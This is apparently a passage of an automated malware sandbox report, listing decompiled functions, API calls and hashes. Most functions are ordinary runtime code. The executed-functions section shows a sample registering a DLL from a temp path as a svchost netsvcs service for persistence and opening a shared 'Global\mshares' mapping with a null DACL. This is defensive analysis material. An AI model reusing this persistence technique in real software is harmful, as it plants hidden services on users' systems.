    • Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLast_free
    • String ID:
    • API String ID: 2283115069-0
    • Opcode ID: d2a7183bac21a7de5d99a37ba1316afadf6fd9a88116798414a5c034ab966cd9
    • Instruction ID: 54c840313e6112a5e98d5c1d7a19b17f8a4792016e21d13f20bb0e7522ebe295
    • Opcode Fuzzy Hash: d2a7183bac21a7de5d99a37ba1316afadf6fd9a88116798414a5c034ab966cd9
    • Instruction Fuzzy Hash: 1B115C72E18A067BE662317C6C81FEF2559ABE1676B300274F2D4D60C0EE378C014328
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E01075241(void* __ecx) {
    				intOrPtr _t2;
    				signed int _t3;
    				signed int _t13;
    				signed int _t18;
    				long _t21;
    
    				_t21 = GetLastError();
    				_t2 =  *0x1083060; // 0x5
    				_t24 = _t2 - 0xffffffff;
    				if(_t2 == 0xffffffff) {
    					L6:
    					_t3 = E010766B7(__eflags, _t2, 0xffffffff);
    					__eflags = _t3;
    					if(_t3 == 0) {
    						goto L3;
    					} else {
    						_t18 = E010754A9(1, 0x364);
    						__eflags = _t18;
    						if(__eflags != 0) {
    							__eflags = E010766B7(__eflags,  *0x1083060, _t18);
    							if(__eflags != 0) {
    								E01074F18(_t18, 0x10843e4);
    								E01074D72(0);
    								goto L13;
    							} else {
    								_t13 = 0;
    								E010766B7(__eflags,  *0x1083060, 0);
    								_push(_t18);
    								goto L9;
    							}
    						} else {
    							_t13 = 0;
    							__eflags = 0;
    							E010766B7(0,  *0x1083060, 0);
    							_push(0);
    							L9:
    							E01074D72();
    							goto L4;
    						}
    					}
    				} else {
    					_t18 = E01076678(_t24, _t2);
    					if(_t18 == 0) {
    						_t2 =  *0x1083060; // 0x5
    						goto L6;
    					} else {
    						if(_t18 != 0xffffffff) {
    							L13:
    							_t13 = _t18;
    						} else {
    							L3:
    							_t13 = 0;
    							L4:
    							_t18 = _t13;
    						}
    					}
    				}
    				SetLastError(_t21);
    				asm("sbb edi, edi");
    				return  ~_t18 & _t13;
    			}








    0x0107524c
    0x0107524e
    0x01075253
    0x01075256
    0x01075274
    0x01075277
    0x0107527c
    0x0107527e
    0x00000000
    0x01075280
    0x0107528c
    0x01075290
    0x01075292
    0x010752b7
    0x010752b9
    0x010752d2
    0x010752d9
    0x00000000
    0x010752bb
    0x010752bb
    0x010752c4
    0x010752c9
    0x00000000
    0x010752c9
    0x01075294
    0x01075294
    0x01075294
    0x0107529d
    0x010752a2
    0x010752a3
    0x010752a3
    0x00000000
    0x010752a8
    0x01075292
    0x01075258
    0x0107525e
    0x01075262
    0x0107526f
    0x00000000
    0x01075264
    0x01075267
    0x010752e1
    0x010752e1
    0x01075269
    0x01075269
    0x01075269
    0x0107526b
    0x0107526b
    0x0107526b
    0x01075267
    0x01075262
    0x010752e4
    0x010752ec
    0x010752f5

    APIs
    • GetLastError.KERNEL32(?,00000000,?,0107395D,01078335,?,01077007,?,00000000,?,?,?,?,01077052,?,00000000), ref: 01075246
    • _free.LIBCMT ref: 010752A3
    • _free.LIBCMT ref: 010752D9
    • SetLastError.KERNEL32(00000000,00000005,000000FF,?,0107395D,01078335,?,01077007,?,00000000,?,?,?,?,01077052,?), ref: 010752E4
    Memory Dump Source
    • Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true
    • Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLast_free
    • String ID:
    • API String ID: 2283115069-0
    • Opcode ID: b33c0731fcd2f70644c56ed124fc84ea41da9e0a762bc48647a7348aa514be7e
    • Instruction ID: 32e59a114ad788212d8950d36244c52e96d65d8c484480654e0c9c69a04a6927
    • Opcode Fuzzy Hash: b33c0731fcd2f70644c56ed124fc84ea41da9e0a762bc48647a7348aa514be7e
    • Instruction Fuzzy Hash: 1E112971E0C6066AE622217C9C85FEE2559FBE66757340224F5D5D60C4EE278C034328
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0107A136(void* _a4, long _a8, DWORD* _a12) {
    				void* _t13;
    
    				_t13 = WriteConsoleW( *0x1083870, _a4, _a8, _a12, 0);
    				if(_t13 == 0 && GetLastError() == 6) {
    					E0107A11F();
    					E0107A0E1();
    					_t13 = WriteConsoleW( *0x1083870, _a4, _a8, _a12, _t13);
    				}
    				return _t13;
    			}




    0x0107a153
    0x0107a157
    0x0107a164
    0x0107a169
    0x0107a184
    0x0107a184
    0x0107a18a

    APIs
    • WriteConsoleW.KERNEL32(?,?,01076F6B,00000000,?,?,01079B8F,?,00000001,?,00000001,?,01078FD2,00000000,?,00000001), ref: 0107A14D
    • GetLastError.KERNEL32(?,01079B8F,?,00000001,?,00000001,?,01078FD2,00000000,?,00000001,00000000,00000001,?,01079526,01076EFA), ref: 0107A159
      • Part of subcall function 0107A11F: CloseHandle.KERNEL32(FFFFFFFE,0107A169,?,01079B8F,?,00000001,?,00000001,?,01078FD2,00000000,?,00000001,00000000,00000001), ref: 0107A12F
    • ___initconout.LIBCMT ref: 0107A169
      • Part of subcall function 0107A0E1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0107A110,01079B7C,00000001,?,01078FD2,00000000,?,00000001,00000000), ref: 0107A0F4
    • WriteConsoleW.KERNEL32(?,?,01076F6B,00000000,?,01079B8F,?,00000001,?,00000001,?,01078FD2,00000000,?,00000001,00000000), ref: 0107A17E
    Memory Dump Source
    • Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true
    • Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
    • String ID:
    • API String ID: 2744216297-0
    • Opcode ID: ca748be1090576c6fd9b2d9a9d809dc69a8afb68261faff7b406a6751e114fe8
    • Instruction ID: cd00e5fa066c85d10e40e907f2ea07f355e8080cd7929e278fc6fda1a24e88f6
    • Opcode Fuzzy Hash: ca748be1090576c6fd9b2d9a9d809dc69a8afb68261faff7b406a6751e114fe8
    • Instruction Fuzzy Hash: F2F0F836900219FBCF222ED5EC08A8D3F66FF486B0B048050FB9896120C637C8609B95
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E01074719() {
    
    				E01074D72( *0x10843f0);
    				 *0x10843f0 = 0;
    				E01074D72( *0x10843f4);
    				 *0x10843f4 = 0;
    				E01074D72( *0x10840e0);
    				 *0x10840e0 = 0;
    				E01074D72( *0x10840e4);
    				 *0x10840e4 = 0;
    				return 1;
    			}



    0x01074722
    0x0107472f
    0x01074735
    0x01074740
    0x01074746
    0x01074751
    0x01074757
    0x0107475f
    0x01074768

    APIs
    • _free.LIBCMT ref: 01074722
      • Part of subcall function 01074D72: HeapFree.KERNEL32(00000000,00000000,?,010776B9,?,00000000,?,?,?,010776E0,?,00000007,?,?,01077BA2,?), ref: 01074D88
      • Part of subcall function 01074D72: GetLastError.KERNEL32(?,?,010776B9,?,00000000,?,?,?,010776E0,?,00000007,?,?,01077BA2,?,?), ref: 01074D9A
    • _free.LIBCMT ref: 01074735
    • _free.LIBCMT ref: 01074746
    • _free.LIBCMT ref: 01074757
    Memory Dump Source
    • Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true
    • Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 3debecf91a3ebff133225a38e9681a991a1b00032e320fc2d164fee18731118a
    • Instruction ID: 03fd9a2b9ea2b8b216c76d715ef2f34c9b9cc92341153972ff874eacef3fa300
    • Opcode Fuzzy Hash: 3debecf91a3ebff133225a38e9681a991a1b00032e320fc2d164fee18731118a
    • Instruction Fuzzy Hash: ADE0B679C189639A86337F24B900B8F3A61F774700341850AF6D1D6218EB3F09269FC9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E01075D87(void* __edx, void* __eflags, intOrPtr _a4, char _a8, char _a12, void* _a16) {
    				void* _v5;
    				char _v12;
    				char _v16;
    				char* _v20;
    				char _v24;
    				void* __ebx;
    				void* __ebp;
    				char _t39;
    				char _t48;
    				char _t51;
    				char _t58;
    				signed int _t63;
    				signed int _t64;
    				void* _t75;
    				void* _t80;
    				signed int _t85;
    
    				_t78 = __edx;
    				_push(_a16);
    				_push(_a12);
    				E01075EA0(__edx, __eflags);
    				_t39 = E01075B30(__eflags, _a4);
    				_v16 = _t39;
    				if(_t39 !=  *((intOrPtr*)( *(_a12 + 0x48) + 4))) {
    					_push(_t63);
    					_t80 = E010777CF(0x220);
    					_t64 = _t63 | 0xffffffff;
    					__eflags = _t80;
    					if(__eflags == 0) {
    						L5:
    						_t85 = _t64;
    					} else {
    						_t80 = memcpy(_t80,  *(_a12 + 0x48), 0x88 << 2);
    						 *_t80 =  *_t80 & 0x00000000;
    						_t85 = E01075F9B(_t64, _t78, __eflags, _v16, _t80);
    						__eflags = _t85 - _t64;
    						if(__eflags != 0) {
    							__eflags = _a8;
    							if(_a8 == 0) {
    								E010749E6();
    							}
    							asm("lock xadd [eax], ebx");
    							__eflags = _t64 == 1;
    							if(_t64 == 1) {
    								_t58 = _a12;
    								__eflags =  *((intOrPtr*)(_t58 + 0x48)) - 0x1083068;
    								if( *((intOrPtr*)(_t58 + 0x48)) != 0x1083068) {
    									E01074D72( *((intOrPtr*)(_t58 + 0x48)));
    								}
    							}
    							 *_t80 = 1;
    							_t75 = _t80;
    							_t80 = 0;
    							 *(_a12 + 0x48) = _t75;
    							_t48 = _a12;
    							__eflags =  *(_t48 + 0x350) & 0x00000002;
    							if(( *(_t48 + 0x350) & 0x00000002) == 0) {
    								__eflags =  *0x1083750 & 0x00000001;
    								if(__eflags == 0) {
    									_v24 =  &_a12;
    									_v20 =  &_a16;
    									_t51 = 5;
    									_v16 = _t51;
    									_v12 = _t51;
    									_push( &_v16);
    									_push( &_v24);
    									_push( &_v12);
    									E01075A22(__eflags);
    									__eflags = _a8;
    									if(_a8 != 0) {
    										 *0x1083644 =  *_a16;
    									}
    								}
    							}
    						} else {
    							 *((intOrPtr*)(E01073958(__eflags))) = 0x16;
    							goto L5;
    						}
    					}
    					E01074D72(_t80);
    					return _t85;
    				} else {
    					return 0;
    				}
    			}



















    0x01075d87
    0x01075d8f
    0x01075d92
    0x01075d95
    0x01075d9d
    0x01075da8
    0x01075db1
    0x01075db7
    0x01075dc4
    0x01075dc6
    0x01075dca
    0x01075dcc
    0x01075dfc
    0x01075dfc
    0x01075dce
    0x01075ddb
    0x01075de1
    0x01075de9
    0x01075ded
    0x01075def
    0x01075e0c
    0x01075e10
    0x01075e12
    0x01075e12
    0x01075e1d
    0x01075e21
    0x01075e22
    0x01075e24
    0x01075e27
    0x01075e2e
    0x01075e33
    0x01075e38
    0x01075e2e
    0x01075e39
    0x01075e3f
    0x01075e44
    0x01075e46
    0x01075e49
    0x01075e4c
    0x01075e53
    0x01075e55
    0x01075e5c
    0x01075e61
    0x01075e6c
    0x01075e6f
    0x01075e70
    0x01075e73
    0x01075e79
    0x01075e7d
    0x01075e81
    0x01075e82
    0x01075e87
    0x01075e8b
    0x01075e96
    0x01075e96
    0x01075e8b
    0x01075e5c
    0x01075df1
    0x01075df6
    0x00000000
    0x01075df6
    0x01075def
    0x01075dff
    0x01075e0b
    0x01075db3
    0x01075db6
    0x01075db6

    APIs
      • Part of subcall function 01075B30: GetOEMCP.KERNEL32(00000000,01075DA2,01078C59,00000000,?,?,00000000,?,01078C59), ref: 01075B5B
    • _free.LIBCMT ref: 01075DFF
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true
    • Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free
    • String ID: pr
    • API String ID: 269201875-2331350302
    • Opcode ID: ffac0d95216135faf059871368c74817bf240a7e7c62e627858e79272ba6378f
    • Instruction ID: 2c1d17ec6bc189ef91334743497ab3b6b0474f19042395b130691647659cd487
    • Opcode Fuzzy Hash: ffac0d95216135faf059871368c74817bf240a7e7c62e627858e79272ba6378f
    • Instruction Fuzzy Hash: 4C31AB72D0424AAFDB12EF68C884ADE7BE4FF44310F1144A9E9919B2A1EB329C51CB54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E010713B5(intOrPtr* __ecx, void* __eflags) {
    				intOrPtr* _t13;
    
    				_t13 = __ecx;
    				E01071408(__ecx);
    				 *__ecx = 0x38;
    				 *((intOrPtr*)(__ecx + 8)) = 0x1070000;
    				 *((intOrPtr*)(__ecx + 4)) = 0x1070000;
    				 *((intOrPtr*)(__ecx + 0xc)) = 0xe00;
    				 *((intOrPtr*)(__ecx + 0x10)) = 0x107d1d0;
    				if(E01071390(0x1070000, __ecx + 0x14) < 0) {
    					if(IsDebuggerPresent() != 0) {
    						OutputDebugStringW(L"ERROR : Unable to initialize critical section in CAtlBaseModule\n");
    					}
    					 *0x10845b8 = 1;
    				}
    				return _t13;
    			}




    0x010713b6
    0x010713b8
    0x010713c2
    0x010713cb
    0x010713ce
    0x010713d1
    0x010713d8
    0x010713e6
    0x010713f0
    0x010713f7
    0x010713f7
    0x010713fd
    0x010713fd
    0x01071407

    APIs
      • Part of subcall function 01071390: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,010713E4,?,?,?,0107100A), ref: 01071395
      • Part of subcall function 01071390: GetLastError.KERNEL32(?,?,?,0107100A), ref: 0107139F
    • IsDebuggerPresent.KERNEL32(?,?,?,0107100A), ref: 010713E8
    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0107100A), ref: 010713F7
    Strings
    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 010713F2
    Memory Dump Source
    • Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true
    • Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
    • API String ID: 3511171328-631824599
    • Opcode ID: 7c111d83116b5db6281bff36d901b34e774f98fd50b95af52e2e2e9cef3edccd
    • Instruction ID: 13e33f0b195e644ed9bc010efa9a63318a6fef963f82c352b2f9354bb08bffec
    • Opcode Fuzzy Hash: 7c111d83116b5db6281bff36d901b34e774f98fd50b95af52e2e2e9cef3edccd
    • Instruction Fuzzy Hash: 42E06D70E003028BD3719F65E4083467BE4BF04255F00895CE9C1E7A80DBB5E0468BA5
    Uniqueness

    Uniqueness Score: -1.00%

    Executed Functions

    APIs
    • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,00000000,00000003,?), ref: 030310EE
    • RegGetValueA.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,netsvcs,00000020,00000000,?,?), ref: 0303111A
    • RegSetValueExA.KERNELBASE(?,netsvcs,00000000,00000007,00000000,?), ref: 030311E5
    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 030311FA
    • GetLastError.KERNEL32 ref: 0303120C
    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 03031229
    • CloseHandle.KERNEL32(00000000), ref: 03031241
    • CreateServiceA.ADVAPI32(00000000,?,?,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 030312A1
    • ChangeServiceConfig2A.ADVAPI32(00000000,00000001,?), ref: 030312BB
    • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,?), ref: 0303131B
    • RegCreateKeyA.ADVAPI32(?,Parameters,?), ref: 03031339
    • RegSetValueExA.ADVAPI32(?,ServiceDll,00000000,00000002,C:\Users\user\AppData\Local\Temp\edgDDEA.tmp,C:\Users\user\AppData\Local\Temp\edgDDEA.tmp), ref: 03031367
    • GetLastError.KERNEL32 ref: 03031373
    • CloseServiceHandle.ADVAPI32(?), ref: 03031387
    • CloseServiceHandle.ADVAPI32(00000000), ref: 03031392
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: CloseService$HandleOpenValue$ChangeCreateErrorLast$Config2FindManagerNotification
    • String ID: %SystemRoot%\System32\svchost.exe -k netsvcs$C:\Users\user\AppData\Local\Temp\edgDDEA.tmp$Parameters$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost$SYSTEM\CurrentControlSet\Services\$ServiceDll$netsvcs
    • API String ID: 3171096773-3440416071
    • Opcode ID: 78911a5974a861eb1e914b87547b0105b86b939690b5e05e9c17e87dca5b8b77
    • Instruction ID: 6f59258a6960ab43b0332b22d07a66063b4dd4e5a9cf5a4f999633beb1f18214
    • Opcode Fuzzy Hash: 78911a5974a861eb1e914b87547b0105b86b939690b5e05e9c17e87dca5b8b77
    • Instruction Fuzzy Hash: 458109B9942218BBDB35EF24DC45BEA77BCAB09300F0405E9E909E7241D7719FA48F90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E6D8611F0(void* __ebx, void* __edi, void* __esi) {
    				struct _SECURITY_ATTRIBUTES* _v8;
    				signed int _v12;
    				char _v20;
    				intOrPtr _v28;
    				signed int _v32;
    				struct _SECURITY_DESCRIPTOR _v52;
    				struct _SECURITY_ATTRIBUTES _v64;
    				void* _v68;
    				long _v72;
    				long _v76;
    				void* _v80;
    				void _v84;
    				void* __ebp;
    				signed int _t34;
    				signed int _t35;
    				void* _t43;
    				void* _t44;
    				void* _t51;
    				void* _t53;
    				void _t57;
    				void _t58;
    				void* _t61;
    				void* _t64;
    				intOrPtr _t70;
    				void* _t72;
    				void* _t77;
    				intOrPtr _t78;
    				void* _t80;
    				void _t83;
    				signed int _t84;
    				void* _t85;
    
    				_push(0xfffffffe);
    				_push(0x6d875490);
    				_push(E6D865090);
    				_push( *[fs:0x0]);
    				_t34 =  *0x6d877014; // 0x6a907f72
    				_v12 = _v12 ^ _t34;
    				_t35 = _t34 ^ _t84;
    				_v32 = _t35;
    				_push(__edi);
    				_push(_t35);
    				 *[fs:0x0] =  &_v20;
    				_v28 = _t85 - 0x40;
    				_t80 = 0;
    				_t64 = 0;
    				_v72 = 0;
    				_v76 = 0;
    				if(E6D862D10() == 0) {
    					E6D8631E0(GetCurrentThread());
    					_t43 = E6D8627B0(0x6d8c1a78, E6D861150); // executed
    					if(_t43 == 0) {
    						_t44 = E6D862D70(); // executed
    						if(_t44 == 0) {
    							InitializeSecurityDescriptor( &_v52, 1);
    							SetSecurityDescriptorDacl( &_v52, 1, 0, 0);
    							_v64.nLength = 0xc;
    							_v64.bInheritHandle = 0;
    							_v64.lpSecurityDescriptor =  &_v52;
    							_t51 = CreateFileMappingA(0xffffffff,  &_v64, 0x8000004, 0, 0x400, "Global\\mshares"); // executed
    							_t80 = _t51;
    							_v68 = _t80;
    							if(_t80 == 0) {
    								GetLastError();
    							} else {
    								_t53 = MapViewOfFile(_t80, 6, 0, 0, 0x400); // executed
    								_t64 = _t53;
    								_v80 = _t64;
    								if(_t64 != 0) {
    									E6D865880(__edi, _t64, 0, 0x400);
    									_v8 = 0;
    									_t70 =  *0x6d877880; // 0x32d9
    									 *0x6d877880 = _t70 +  *(_t64 + 4) /  *_t64;
    									_t77 = _t64;
    									_t23 = _t77 + 1; // 0x1
    									_t72 = _t23;
    									do {
    										_t57 =  *_t77;
    										_t77 = _t77 + 1;
    										_t96 = _t57;
    									} while (_t57 != 0);
    									_t78 = _t77 - _t72;
    									_v76 = _t78;
    									_t25 = _t78 + 1; // 0x2
    									_push(_t25);
    									_t58 = E6D8640A6(_t96);
    									_v84 = _t58;
    									_t83 = _t58;
    									E6D865880(_t78, _t83, 0, _t25);
    									_v72 = _t83;
    									E6D8659E0(_t83, _t64, _t78);
    									_v8 = 0xfffffffe;
    									_push(8);
    									_t61 = E6D864299(_t96);
    									 *_t61 = _t83;
    									 *((intOrPtr*)(_t61 + 4)) = _t78;
    									CreateThread(0, 0, E6D8611D0, _t61, 0, 0); // executed
    									_t80 = _v68;
    								}
    							}
    						}
    					}
    				}
    				if(_t80 != 0) {
    					FindCloseChangeNotification(_t80); // executed
    				}
    				if(_t64 != 0) {
    					UnmapViewOfFile(_t64);
    				}
    				 *[fs:0x0] = _v20;
    				return E6D864095(_v32 ^ _t84);
    			}


































    0x6d8611f3
    0x6d8611f5
    0x6d8611fa
    0x6d861205
    0x6d861209
    0x6d86120e
    0x6d861211
    0x6d861213
    0x6d861218
    0x6d861219
    0x6d86121d
    0x6d861223
    0x6d861226
    0x6d861228
    0x6d86122a
    0x6d86122d
    0x6d861237
    0x6d861244
    0x6d861253
    0x6d86125a
    0x6d861260
    0x6d861267
    0x6d861273
    0x6d861281
    0x6d861287
    0x6d86128e
    0x6d861294
    0x6d8612ad
    0x6d8612b3
    0x6d8612b5
    0x6d8612ba
    0x6d8613b9
    0x6d8612c0
    0x6d8612ca
    0x6d8612d0
    0x6d8612d2
    0x6d8612d7
    0x6d8612e5
    0x6d8612f0
    0x6d8612fe
    0x6d861306
    0x6d86130c
    0x6d86130e
    0x6d86130e
    0x6d861311
    0x6d861311
    0x6d861313
    0x6d861314
    0x6d861314
    0x6d861318
    0x6d86131a
    0x6d86131d
    0x6d861320
    0x6d861321
    0x6d861326
    0x6d86132c
    0x6d86132f
    0x6d861334
    0x6d86133a
    0x6d861342
    0x6d861382
    0x6d861384
    0x6d86138c
    0x6d86138e
    0x6d86139f
    0x6d8613a5
    0x6d8613a5
    0x6d8612d7
    0x6d8612ba
    0x6d861267
    0x6d86125a
    0x6d8613c1
    0x6d8613c4
    0x6d8613c4
    0x6d8613cc
    0x6d8613cf
    0x6d8613cf
    0x6d8613d8
    0x6d8613f0

    APIs
    • GetCurrentThread.KERNEL32 ref: 6D86123D
    • InitializeSecurityDescriptor.ADVAPI32(?,00000001,6D8C1A78,6D861150,00000000), ref: 6D861273
    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 6D861281
    • CreateFileMappingA.KERNEL32 ref: 6D8612AD
    • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000400), ref: 6D8612CA
    • CreateThread.KERNELBASE(00000000,00000000,Function_000011D0,00000000,00000000,00000000), ref: 6D86139F
    • GetLastError.KERNEL32 ref: 6D8613B9
    • FindCloseChangeNotification.KERNELBASE(00000000,6A907F72,00000001,00000000,00000000), ref: 6D8613C4
    • UnmapViewOfFile.KERNEL32(00000000,6A907F72,00000001,00000000,00000000), ref: 6D8613CF
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: File$CreateDescriptorSecurityThreadView$ChangeCloseCurrentDaclErrorFindInitializeLastMappingNotificationUnmap
    • String ID: Global\mshares
    • API String ID: 1286842342-2130681182
    • Opcode ID: fe5c970783b3dfc6efa0d5f4e7a7f610723989f26c08fa14a71e21cf66aced5e
    • Instruction ID: df2699effe3bea71c49ad574c2ebffa4806820a88b061df8859d2f750d13cb08
    • Opcode Fuzzy Hash: fe5c970783b3dfc6efa0d5f4e7a7f610723989f26c08fa14a71e21cf66aced5e
    • Instruction Fuzzy Hash: 6C41B1B1D04668EFDB109FA9CD4DFAE7BB8FB09B24F000519FA15A6281E7355800CBA5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 69%
    			E2FF1159F(void* __ebx, short __edx, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
    				void* __edi;
    				void* __ebp;
    				struct HINSTANCE__* _t5;
    				void* _t9;
    				_Unknown_base(*)()* _t11;
    				void* _t16;
    				intOrPtr* _t17;
    				void* _t20;
    				struct HINSTANCE__* _t21;
    				void* _t22;
    
    				_t22 = __esi;
    				_t16 = __ebx;
    				_push(L"wwlib.dll"); // executed
    				_t5 = E2FF11656(__ebx, _t20, __esi, __eflags); // executed
    				_t21 = _t5;
    				if(_t21 == 0) {
    					_t21 = E2FF12024(__edx, _t21, __esi, L"{019C826E-445A-4649-A5B0-0BF08FCC4EEE}");
    					__eflags = _t21;
    					if(_t21 != 0) {
    						goto L1;
    					}
    					GetLastError();
    					return 1;
    				}
    				L1:
    				_push(_t16);
    				_push(_t22);
    				_t17 = GetProcAddress(_t21, "FMain");
    				if(_t17 == 0) {
    					L7:
    					_t9 = 1;
    					L5:
    					return _t9;
    				}
    				 *0x2ff13010 = GetProcAddress(_t21, "wdCommandDispatch");
    				_t11 = GetProcAddress(_t21, "wdGetApplicationObject");
    				 *0x2ff13014 = _t11;
    				if( *0x2ff13010 == 0 || _t11 == 0) {
    					goto L7;
    				} else {
    					 *_t17(_a4, _a8, _a12, _a16);
    					_t9 = 0;
    					goto L5;
    				}
    			}













    0x2ff1159f
    0x2ff1159f
    0x2ff115a3
    0x2ff115a8
    0x2ff115ad
    0x2ff115b1
    0x2ff11cce
    0x2ff11cd0
    0x2ff11cd2
    0x00000000
    0x00000000
    0x2ff11cd8
    0x00000000
    0x2ff11ce0
    0x2ff115b7
    0x2ff115b7
    0x2ff115b8
    0x2ff115c7
    0x2ff115cb
    0x2ff1160b
    0x2ff1160d
    0x2ff11604
    0x00000000
    0x2ff11605
    0x2ff115db
    0x2ff115e0
    0x2ff115e9
    0x2ff115ee
    0x00000000
    0x2ff115f4
    0x2ff11600
    0x2ff11602
    0x00000000
    0x2ff11602

    APIs
      • Part of subcall function 2FF11656: LoadLibraryW.KERNELBASE(?,2FF116A8,00000010,2FF115AD,wwlib.dll,2FF13074,?,2FF1159A,2FF10000,00000000,00000001,?), ref: 2FF11685
    • GetProcAddress.KERNEL32(00000000,FMain), ref: 2FF115C5
    • GetProcAddress.KERNEL32(00000000,wdCommandDispatch), ref: 2FF115D3
    • GetProcAddress.KERNEL32(00000000,wdGetApplicationObject), ref: 2FF115E0
    • GetLastError.KERNEL32({019C826E-445A-4649-A5B0-0BF08FCC4EEE},wwlib.dll,2FF13074,?,2FF1159A,2FF10000,00000000,00000001,?), ref: 2FF11CD8
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.462834723.000000002FF11000.00000020.00020000.sdmp, Offset: 2FF10000, based on PE: true
    • Associated: 00000002.00000002.462824849.000000002FF10000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.462857250.000000002FF14000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463124095.000000002FF90000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463277628.000000002FFCD000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463417896.000000003003D000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AddressProc$ErrorLastLibraryLoad
    • String ID: FMain$wdCommandDispatch$wdGetApplicationObject$wwlib.dll${019C826E-445A-4649-A5B0-0BF08FCC4EEE}
    • API String ID: 856020675-2078634211
    • Opcode ID: d14f2e4602a0f4e28df0d7e8fbbdb3f13a1f91f09e294bb466dcc46944fc8816
    • Instruction ID: 8b4ac3a2032848896e84c017a991beefc57bec694339961f258209e3651fda33
    • Opcode Fuzzy Hash: d14f2e4602a0f4e28df0d7e8fbbdb3f13a1f91f09e294bb466dcc46944fc8816
